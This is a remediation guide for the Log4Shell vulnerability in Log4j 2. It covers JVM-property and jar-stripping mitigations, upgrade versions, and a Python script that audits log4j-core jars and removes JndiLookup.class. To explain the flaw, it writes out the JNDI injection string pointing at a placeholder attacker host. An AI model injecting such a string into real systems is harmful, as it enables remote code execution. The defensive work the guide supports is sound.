Log4j Vulnerability Fix

The Log4j vulnerability (CVE-2021-44228, "Log4Shell") affects Log4j 2 from 2.0-beta9 through 2.14.1. The first fixes were themselves incomplete (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832), and the whole series was closed in 2.17.1. The root cause is that Log4j resolves ${...} lookups inside the text of a logged message. An attacker who can get a string such as ${jndi:ldap://<attacker-host>/a} into any field that ends up in a log line (a User-Agent header, a username, a form value) makes the application perform a JNDI lookup against a server the attacker controls, outside the domain where the application is installed; on vulnerable JVM configurations that lookup returns a remote class that the application loads and executes.

As an immediate mitigation, admins can start the JVM with the system property -Dlog4j2.formatMsgNoLookups=true (it is a JVM property, not an environment flag; the equivalent environment variable is LOG4J_FORMAT_MSG_NO_LOOKUPS=true). This property only exists in 2.10 through 2.14.1, and it was later shown to be incomplete (CVE-2021-45046: with a non-default Pattern Layout using a Context Lookup, attacker-controlled Thread Context Map values still reach JNDI), so treat it as a stopgap, not a fix.

Next remove the JndiLookup class from every log4j-core jar on the classpath. This works on all 2.x versions, including the old ones that do not have the property above, and it is the mitigation Apache recommended over the property. Stop the application first (rewriting a jar the JVM has open is not safe), run the command once per jar rather than relying on the glob to cover several, confirm by listing the jar that the entry is gone, then restart:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

The permanent fix is to replace the log4j-core and log4j-api jars on the classpath with version 2.17.1 or later (2.12.4 for Java 7 and 2.3.2 for Java 6) and restart the application. Also check for copies bundled inside other artifacts (fat jars, war files, vendor products), which a look at the visible classpath alone will miss.
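The three steps above amount to an inventory-and-triage job across every host. The script below is an added example (not Apache code and not from this page): it walks a directory tree for log4j-core jars, reads the version from each manifest, reports which ones still carry JndiLookup.class and need upgrading, and can strip that class in place from the vulnerable ones (the same effect as the zip -d command, without needing the zip binary and without touching jars that are already at 2.17.1). The version thresholds are the ones stated above; make_fake_log4j_jar and demo only build constructed fixtures (a manifest plus a dummy class entry, not real bytecode) so the script runs offline.

```python
"""Find log4j-core jars, triage their version, and optionally strip JndiLookup.class.

Added example, not Apache/Log4j project code. Version thresholds follow the public
advisory history: CVE-2021-44228 hits 2.0-beta9..2.14.1; follow-ups closed in 2.17.1.
"""
import io
import os
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
FIXED_VERSION = (2, 17, 1)


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); pre-releases such as '2.0-beta9' count as (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised log4j version: {version!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def needs_upgrade(version):
    """True for any Log4j 2 release older than 2.17.1."""
    v = parse_version(version)
    return v[0] == 2 and v < FIXED_VERSION


def jar_version(jar_path):
    """Implementation-Version from the jar manifest, or None if it is missing."""
    with zipfile.ZipFile(jar_path) as zf:
        if MANIFEST not in zf.namelist():
            return None
        for line in zf.read(MANIFEST).decode("utf-8", "replace").splitlines():
            if line.startswith("Implementation-Version:"):
                return line.split(":", 1)[1].strip()
    return None


def has_jndi_lookup(jar_path):
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP in zf.namelist()


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (what `zip -d` does). True if removed."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP:
                    dst.writestr(item, src.read(item.filename))
    tmp = jar_path + ".tmp"
    with open(tmp, "wb") as f:
        f.write(buf.getvalue())
    os.replace(tmp, jar_path)  # atomic swap: a crash leaves the original jar intact
    return True


def find_log4j_core_jars(root):
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def audit(root, remove=False):
    """{jar_path: (version, had_jndi_lookup, needs_upgrade)}; strips the class from
    vulnerable jars when remove=True. An unreadable version is treated as vulnerable."""
    report = {}
    for jar in find_log4j_core_jars(root):
        version = jar_version(jar)
        upgrade = needs_upgrade(version) if version else True
        present = has_jndi_lookup(jar)
        if present and upgrade and remove:
            strip_jndi_lookup(jar)
        report[jar] = (version, present, upgrade)
    return report


def make_fake_log4j_jar(path, version, with_jndi=True):
    """Constructed fixture: manifest plus a dummy JndiLookup entry (not real bytecode)."""
    os.makedirs(os.path.dirname(path) or ".", exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def demo(remove=True):
    """Audit a temp tree of constructed jars; returns
    {basename: (version, had_jndi_lookup, needs_upgrade, still_has_jndi_after)}."""
    import tempfile
    root = tempfile.mkdtemp(prefix="log4j-audit-")
    make_fake_log4j_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1")
    make_fake_log4j_jar(os.path.join(root, "log4j-core-2.0-beta9.jar"), "2.0-beta9")
    make_fake_log4j_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    report = audit(root, remove=remove)
    return {os.path.basename(j): v + (has_jndi_lookup(j),) for j, v in report.items()}


if __name__ == "__main__":
    for name, (ver, had, upgrade, still) in demo().items():
        print(f"{name}: version={ver} had_jndi={had} needs_upgrade={upgrade} jndi_after={still}")
```

Run it against a real tree with audit("/opt/app", remove=True) only after stopping the JVM, and keep the report: stripping the class is the stopgap, the needs_upgrade column is the list of jars that still have to be replaced with 2.17.1.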
